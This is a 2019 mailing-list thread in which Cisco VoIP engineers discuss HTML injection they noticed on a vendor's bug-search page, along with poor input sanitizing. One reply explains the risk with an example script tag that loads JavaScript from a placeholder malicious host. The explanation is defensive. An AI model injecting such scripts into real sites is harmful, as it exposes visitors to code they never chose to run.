[cisco-voip] Bug Search Code Injection

Anthony Holloway avholloway+cisco-voip at gmail.com
Tue Aug 20 16:41:26 EDT 2019


Correct, you got it.

On Tue, Aug 20, 2019 at 2:15 PM Lelio Fulgenzi <lelio at uoguelph.ca> wrote:

> Ah. Gotcha.
>
>
>
> For some reason, I thought it was an example of a vulnerability on Cisco’s
> site that you could inject code into.
>
>
>
> But it’s an example of a “malicious site” with code that would execute on
> your machine.
>
>
>
> Plus, like you said, you don’t know the details of the bug!
>
>
>
> ---
>
> *Lelio Fulgenzi, B.A.* | Senior Analyst
>
> Computing and Communications Services | University of Guelph
>
> Room 037 Animal Science & Nutrition Bldg | 50 Stone Rd E | Guelph, ON |
> N1G 2W1
>
> 519-824-4120 Ext. 56354 | lelio at uoguelph.ca
>
>
>
> www.uoguelph.ca/ccs | @UofGCCS on Instagram, Twitter and Facebook
>
>
>
> [image: University of Guelph Cornerstone with Improve Life tagline]
>
>
>
> *From:* Anthony Holloway <avholloway+cisco-voip at gmail.com>
> *Sent:* Tuesday, August 20, 2019 1:54 PM
> *To:* Lelio Fulgenzi <lelio at uoguelph.ca>
> *Cc:* Norton, Mike <mikenorton at pwsd76.ab.ca>; Cisco VoIP Group <
> cisco-voip at puck.nether.net>
> *Subject:* Re: [cisco-voip] Bug Search Code Injection
>
>
>
> Basically someone typed in some HTML code into the bug description, and
> when my browser received/rendered the page content, my browser saw this
> code as code it needed to execute, hence the <textarea> text box was
> rendered as opposed to the text "<textarea>" just being shown on the page
> (like how it is in the title.
>
>
>
> Now, while this page is not doing anything harmful at the moment, it's not
> impossible for the code to have been:
>
>
>
> <script>https://myharmfulwebsite.com/code-you-dont-want.js</script>
>
>
>
> Then my browser would have downloaded and executed that.
>
>
>
> I'm no hacker, but I know this can't be good.
>
>
>
> Also, if nothing else, it ruins the value of the bug itself, because
> people like you don't know what the hell it's trying to tell you.  Know
> what I mean man?
>
>
>
> On Tue, Aug 20, 2019 at 12:42 PM Lelio Fulgenzi <lelio at uoguelph.ca> wrote:
>
> Ok – for those of us less knowledgeable, how exactly is this “code
> injection” ?
>
>
>
>
>
>
>
> ---
>
> *Lelio Fulgenzi, B.A.* | Senior Analyst
>
> Computing and Communications Services | University of Guelph
>
> Room 037 Animal Science & Nutrition Bldg | 50 Stone Rd E | Guelph, ON |
> N1G 2W1
>
> 519-824-4120 Ext. 56354 | lelio at uoguelph.ca
>
>
>
> www.uoguelph.ca/ccs | @UofGCCS on Instagram, Twitter and Facebook
>
>
>
> [image: University of Guelph Cornerstone with Improve Life tagline]
>
>
>
> *From:* cisco-voip <cisco-voip-bounces at puck.nether.net> *On Behalf Of *Anthony
> Holloway
> *Sent:* Tuesday, August 20, 2019 1:38 PM
> *To:* Norton, Mike <mikenorton at pwsd76.ab.ca>
> *Cc:* Cisco VoIP Group <cisco-voip at puck.nether.net>
> *Subject:* Re: [cisco-voip] Bug Search Code Injection
>
>
>
> Exactly.  Like there might be a feature disabled for preventing code
> injection on the site as a whole, and not all code injection displays
> something like that.  In fact, I'd wager an attack via code injection would
> go unnoticed by the user all together.
>
>
>
> On Tue, Aug 20, 2019 at 12:08 PM Norton, Mike <mikenorton at pwsd76.ab.ca>
> wrote:
>
> Used to be that reading documentation articles about “null” – e.g. null
> routes, Null 0 interface, etc. – would give some rather, uh, “interesting”
> results in the related community discussions box off to the side of the
> article. Agreed it is rather concerning. Basically every language has
> standard functions for properly sanitizing/escaping text so there is no
> excuse other than sloppiness... which makes one wonder what else they are
> sloppy with.
>
> -mn
>
> *From:* cisco-voip <cisco-voip-bounces at puck.nether.net> *On Behalf Of *Anthony
> Holloway
> *Sent:* August 20, 2019 8:35 AM
> *To:* Cisco VoIP Group <cisco-voip at puck.nether.net>
> *Subject:* [cisco-voip] Bug Search Code Injection
>
>
>
> Looks like I stumbled across some code injection on the following defect
> page:
>
>
>
> https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvq27976
>
>
>
> It's innocent enough, but concerning that it's even possible.
>
>
>
> [image: image.png]
>
> _______________________________________________
> cisco-voip mailing list
> cisco-voip at puck.nether.net
> https://puck.nether.net/mailman/listinfo/cisco-voip
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/15c0b347/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 1297 bytes
Desc: not available
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/15c0b347/attachment.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image002.png
Type: image/png
Size: 72638 bytes
Desc: not available
URL: <https://puck.nether.net/pipermail/cisco-voip/attachments/20190820/15c0b347/attachment-0001.png>


More information about the cisco-voip mailing list